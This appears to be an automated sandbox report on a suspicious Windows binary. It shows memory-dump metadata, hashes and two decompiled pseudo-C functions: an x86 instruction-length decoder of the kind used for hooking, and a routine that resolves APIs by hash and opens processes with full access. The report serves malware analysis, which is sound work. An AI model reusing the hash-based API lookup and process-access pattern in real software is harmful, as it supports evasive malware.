0x7331a626
0x7331a654
0x7331a657
0x7331a65c
0x7331a660
0x7331a665
0x7331a66c
0x7331a671
0x7331a673
0x7331ac3a
0x7331ac4b
0x7331ac6b
0x7331ac70
0x7331ac70
0x7331a689
0x7331a68e
0x7331a68e
0x7331a68e
0x7331a68e
0x7331a6a0
0x7331a6a2
0x7331a6a4
0x7331a6b5
0x7331a6b5
0x7331a6bb
0x7331a6c0
0x7331a6c4
0x7331a6ca
0x7331a6d1
0x7331a6d6
0x7331a6d8
0x7331abee
0x7331abff
0x7331ac20
0x7331ac25
0x7331ac25
0x7331a6ef
0x7331a6f4
0x7331a6f4
0x7331a6f4
0x7331a6f4
0x7331a6f7
0x7331a6f7
0x00000000
0x7331a6f7
0x7331a62a
0x7331a62a
0x7331a62c
0x7331a63d
0x7331a63f
0x7331a641
0x00000000
0x00000000
0x7331a64d
0x7331a64e
0x7331a652
0x00000000
0x00000000
0x00000000
0x7331a652
0x7331a643
0x7331a646
0x00000000
0x00000000
0x7331a6f8
0x7331a6f8
0x7331a6f9
0x7331a6f9
0x00000000
0x7331a605
0x7331a5fb

Strings

, xrefs: 7331ABB3

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 78ba412c2fe3e4d4baeb82eb8943496605f0929088a25eae2db3574d9e40e9d5
Instruction ID: 7a16789b9e8cc2db455ef028be1eeae82ae654e3c9de139cbc5693bba7ad3e6b
Opcode Fuzzy Hash: 78ba412c2fe3e4d4baeb82eb8943496605f0929088a25eae2db3574d9e40e9d5
Instruction Fuzzy Hash: 4012A471909B469FD729DF24CC80B6EB7F5EF85211F004A1DE5AA972A4DB30DD22CB42

Uniqueness

Uniqueness Score: -1.00%

Function 733292DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E733292DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E733235D4( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x733292e3
0x733292e7
0x733292f3
0x733292f7
0x733292fb
0x73329300
0x73329303
0x73329305
0x73329307
0x73329307
0x7332930a
0x73329310
0x73329388
0x7332938c
0x7332938f
0x7332938f
0x73329392
0x00000000
0x73329392
0x73329317
0x7332937f
0x73329383
0x00000000
0x73329383
0x7332931e
0x73329377
0x7332937a
0x00000000
0x7332937a
0x73329323
0x73329361
0x73329368
0x7332936b
0x73329334
0x73329334
0x7332933a
0x00000000
0x00000000
0x7332933f
0x73329359
0x7332935c
0x00000000
0x7332935c
0x73329344
0x00000000
0x73329346
0x7332934a
0x7332934d
0x00000000
0x7332934d
0x73329344
0x73329395
0x73329395
0x73329395
0x7332939e
0x733293a7
0x733293aa
0x733293ad
0x733293b0
0x733293b3
0x733293b9
0x733293fb
0x733293fe
0x733293ff
0x73329406
0x73329409
0x733293bb
0x733293bf
0x733293c9
0x733293d0
0x733293d2
0x733293eb
0x733293ee
0x733293ee
0x733293d0
0x73329411
0x73329414
0x73329417
0x7332941b
0x7332941f
0x73329429
0x7332942d
0x73329437
0x73329440
0x7332944d
0x73329450
0x73329453
0x73329453
0x7332945f
0x7332946a
0x73329470
0x73329474
0x73329461
0x73329461
0x73329461
0x7332947c
0x733294a6
0x733294ac
0x733294ac
0x733294b4
0x7332985d
0x73329863
0x73329869
0x73329869
0x00000000
0x733294ba
0x733294ba
0x733294be
0x733294c1
0x733294c4
0x733294c7
0x733294cb
0x733294cd
0x733294d0
0x733294d3
0x733294d7
0x733294dc
0x733294df
0x733294e3
0x733294e8
0x733294eb
0x733294ed
0x733294f0
0x733294f4
0x733294f9
0x73329509
0x7332950f
0x7332950f
0x73329517
0x73329519
0x73329522
0x73329524
0x73329527
0x73329532
0x7332955f
0x73329534
0x7332954b
0x7332954b
0x73329567
0x7332956d
0x73329573
0x73329573
0x73329567
0x73329522
0x7332957a
0x733295eb
0x733295f0
0x73329649
0x7332970b
0x73329710
0x7332971f
0x73329725
0x73329729
0x73329732
0x73329739
0x73329742
0x73329750
0x73329753
0x7332973b
0x7332973b
0x7332973b
0x73329739
0x7332975c
0x73329789
0x7332979c
0x733297a4
0x7332978b
0x7332978d
0x73329795
0x73329795
0x7332975e
0x73329763
0x73329782
0x73329765
0x7332976a
0x7332977b
0x7332976c
0x7332976c
0x7332976c
0x7332976a
0x73329763
0x733297ac
0x733297bb
0x733297c8
0x733297d1
0x733297d5
0x733297d9
0x733297dc
0x733297df
0x733297e2
0x733297e5
0x733297e8
0x733297ee
0x733297f2
0x733297f8
0x733297f8
0x733297ee
0x733297fe
0x7332983b
0x7332983f
0x73329846
0x7332984c
0x73329800
0x73329803
0x73329823
0x73329827
0x7332982e
0x73329835
0x73329805
0x73329808
0x7332980a
0x7332980e
0x73329818
0x7332981e
0x7332981e
0x73329808
0x73329803
0x73329853
0x73329853
0x7332986c
0x7332986c
0x73329872
0x73329877
0x733298d1
0x733298d6
0x73329915
0x7332991a
0x7332991c
0x73329920
0x73329923
0x73329926
0x73329928
0x73329929
0x73329929
0x7332992e
0x7332994c
0x7332994e
0x73329952
0x73329958
0x7332995b
0x7332995d
0x7332995e
0x7332995e
0x00000000
0x73329930
0x73329930
0x73329930
0x73329934
0x7332993a
0x7332993d
0x7332993f
0x73329942
0x73329961
0x73329961
0x73329968
0x73329982
0x7332996a
0x7332996a
0x73329976
0x73329977
0x7332997a
0x7332997a
0x73329990
0x73329990
0x7332992e
0x733298db
0x733298e9
0x73329901
0x73329905
0x73329908
0x7332990e
0x73329912
0x73329912
0x00000000
0x73329912
0x733298eb
0x733298ef
0x733298f5
0x733298f5
0x733298fb
0x00000000
0x733298fb
0x733298dd
0x733298e1
0x00000000
0x733298e1
0x7332987b
0x733298a7
0x733298bf
0x733298c3
0x733298c6
0x733298c9
0x733298cb
0x733298ce
0x733298a9
0x733298a9
0x733298ad
0x733298b0
0x733298b3
0x733298b6
0x733298b9
0x733298b9
0x00000000
0x733298a7
0x73329881
0x00000000
0x00000000
0x73329887
0x7332988b
0x73329891
0x73329894
0x73329897
0x7332989a
0x00000000
0x7332989a
0x73329712
0x73329716
0x7332971c
0x00000000
0x7332971c
0x73329654
0x73329666
0x7332966b
0x733296d6
0x00000000
0x00000000
0x733296dd
0x73329703
0x73329707
0x00000000
0x00000000
0x733296e6
0x733296eb
0x733296ff
0x00000000
0x00000000
0x00000000
0x73329701
0x733296f2
0x00000000
0x00000000
0x733296f7
0x00000000
0x00000000
0x733296f9
0x00000000
0x733296dd
0x7332966d
0x73329677
0x73329688
0x7332968b
0x7332968e
0x73329694
0x00000000
0x00000000
0x00000000
0x00000000
0x7332969a
0x7332969a
0x7332969a
0x733296a1
0x00000000
0x00000000
0x733296a3
0x733296a6
0x733296ac
0x00000000
0x00000000
0x00000000
0x733296ae
0x733296b0
0x733296b9
0x00000000
0x00000000
0x733296cd
0x00000000
0x00000000
0x00000000
0x733296cf
0x7332965b
0x00000000
0x00000000
0x00000000
0x73329661
0x733295f5
0x73329624
0x73329625
0x7332962e
0x00000000
0x7332963f
0x00000000
0x7332963f
0x733295fc
0x733295ff
0x73329612
0x73329613
0x73329617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x733295ff
0x733295f5
0x73329581
0x733295de
0x733295e2
0x733295e8
0x00000000
0x733295e8
0x73329583
0x73329587
0x73329594
0x73329598
0x733295ae
0x733295b6
0x7332959a
0x7332959c
0x733295a6
0x733295a6
0x733295bc
0x733295c5
0x733295dc
0x00000000
0x00000000
0x00000000
0x733295dc
0x733295c7
0x733295c7
0x00000000
0x733295bc

Strings

, xrefs: 73329947

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction ID: 2f411fc1690c672d145be6677235bba16cda13b459e4abb5d4f5f15573f455fc
Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction Fuzzy Hash: 9F22DF304087898BE725CF15C89136ABFF5FF85302F18886EE9D64B2D1D33599A5CB92

Uniqueness

Uniqueness Score: -1.00%

Function 733184E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E733184E4(signed int __ecx, intOrPtr __edx) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t316;
				intOrPtr _t318;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				void* _t345;
				void* _t416;
				signed int _t417;
				signed int _t424;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t437;
				signed int _t441;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				void* _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				void* _t457;
				intOrPtr* _t458;

				_push(_t435);
				_t458 = _t457 - 0xa4;
				 *_t458 = __ecx + 0x1c;
				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
				 *(_t458 + 4) = __ecx;
				 *(_t458 + 0x84) = 0;
				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
				while(1) {
					_t415 =  *(_t458 + 0x6c);
					E7331B714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
					if(E7331F56C(_t458 + 0x24) == 0) {
						goto L3;
					} else {
						 *( *(_t458 + 4) + 0x2c) = 0;
						E7331F6F0(_t458 + 0x24);
					}
					L60:
					_t318 = 0xffffffffffffffff;
					L62:
					if(_t318 != 0) {
						L65:
						return _t318;
					} else {
						if( *(_t458 + 0x84) != 0x20) {
							E7332218C(0x5dc, _t415, _t435);
							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
							continue;
						} else {
							_t318 = 0xffffffffffffffff;
							goto L65;
						}
					}
					L71:
					L3:
					__eflags =  *( *(_t458 + 4));
					if( *( *(_t458 + 4)) > 0) {
						_t326 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x64) = _t326 * 4;
							_t434 = E7331F558( *(_t458 + 0x7c), _t326 * 4);
							_t435 =  *(_t458 + 0x20);
							__eflags = _t435;
							if(_t435 <= 0) {
								L11:
								_t435 =  *(_t458 + 4) + 4;
								_t283 = E7331F568( *(_t458 + 4) + 4);
								__eflags = _t283 -  *(_t458 + 0x64);
								if(_t283 >  *(_t458 + 0x64)) {
									_t451 = 4 + _t326 * 4;
									_t299 = E7331F568(_t435);
									__eflags = _t299 - _t451;
									if(_t299 > _t451) {
										 *((intOrPtr*)(_t458 + 0x9c)) = E7331F558(_t435,  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0x98)) = E7331F558(_t435, _t451);
										E7332382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E7331F568(_t435) - _t451);
										_t458 = _t458 + 0xc;
									}
									E7331F8C4(_t435, E7331F568(_t435) + 0xfffffffc);
									_t308 =  *(_t458 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t450 = E73322F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t450;
								if(_t450 != 0) {
									 *_t450( *(E7331F558( *(_t458 + 4),  *(_t458 + 0x64))));
								}
								_t285 = E7331F568( *_t458);
								__eflags = _t285 -  *(_t458 + 0x64);
								if(_t285 >  *(_t458 + 0x64)) {
									_t453 = 4 + _t326 * 4;
									_t287 = E7331F568( *_t458);
									__eflags = _t287 - _t453;
									if(_t287 > _t453) {
										_t435 = E7331F558( *(_t458 + 4),  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0xa0)) = E7331F558( *(_t458 + 4), _t453);
										E7332382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E7331F568( *_t458) - _t453);
										_t458 = _t458 + 0xc;
									}
									E7331F8C4( *(_t458 + 4), E7331F568( *_t458) + 0xfffffffc);
									_t296 =  *(_t458 + 4);
									_t33 = _t296 + 0x18;
									 *_t33 =  *(_t296 + 0x18) - 1;
									__eflags =  *_t33;
								}
								_t326 = _t326 - 1;
								__eflags = _t326;
							} else {
								_t452 = 0;
								__eflags = 0;
								while(1) {
									_t310 = E7331F558(_t458 + 0x28, _t452 * 4);
									__eflags =  *_t310 -  *_t434;
									if( *_t310 ==  *_t434) {
										break;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _t435;
									if(_t452 < _t435) {
										continue;
									} else {
										goto L11;
									}
									goto L20;
								}
								__eflags = _t452 - 0xffffffff;
								if(_t452 == 0xffffffff) {
									goto L11;
								} else {
								}
							}
							L20:
							_t326 = _t326 + 1;
							__eflags = _t326 -  *( *(_t458 + 4));
						} while (_t326 <  *( *(_t458 + 4)));
					}
					__eflags =  *(_t458 + 0x20);
					if( *(_t458 + 0x20) > 0) {
						_t325 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x7c) = _t325 * 4;
							_t433 = E7331F558(_t458 + 0x28, _t325 * 4);
							_t258 =  *(_t458 + 4);
							_t435 =  *_t258;
							__eflags = _t435;
							if(_t435 <= 0) {
								L29:
								_t445 = E73322F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t445;
								if(_t445 != 0) {
									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E7331F558(_t458 + 0x28,  *(_t458 + 0x7c)))));
									__eflags = _t447;
									if(_t447 != 0) {
										E7331F8C4( *(_t458 + 4), E7331F568( *_t458) + 4);
										 *(E7331F558( *(_t458 + 4), E7331F568( *_t458) + 0xfffffffc)) = _t447;
										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E7331F558(_t458 + 0x28,  *(_t458 + 0x7c));
										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
										E7331F8C4( *((intOrPtr*)(_t458 + 0x74)), E7331F568( *(_t458 + 4) + 4) + 4);
										 *((intOrPtr*)(E7331F558( *((intOrPtr*)(_t458 + 0x74)), E7331F568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t458 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
							} else {
								_t446 = 0;
								__eflags = 0;
								 *(_t458 + 0x88) =  &(_t258[1]);
								while(1) {
									_t279 = E7331F558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
									__eflags =  *_t279 -  *_t433;
									if( *_t279 ==  *_t433) {
										break;
									}
									_t446 = _t446 + 1;
									__eflags = _t446 - _t435;
									if(_t446 < _t435) {
										continue;
									} else {
										goto L29;
									}
									goto L32;
								}
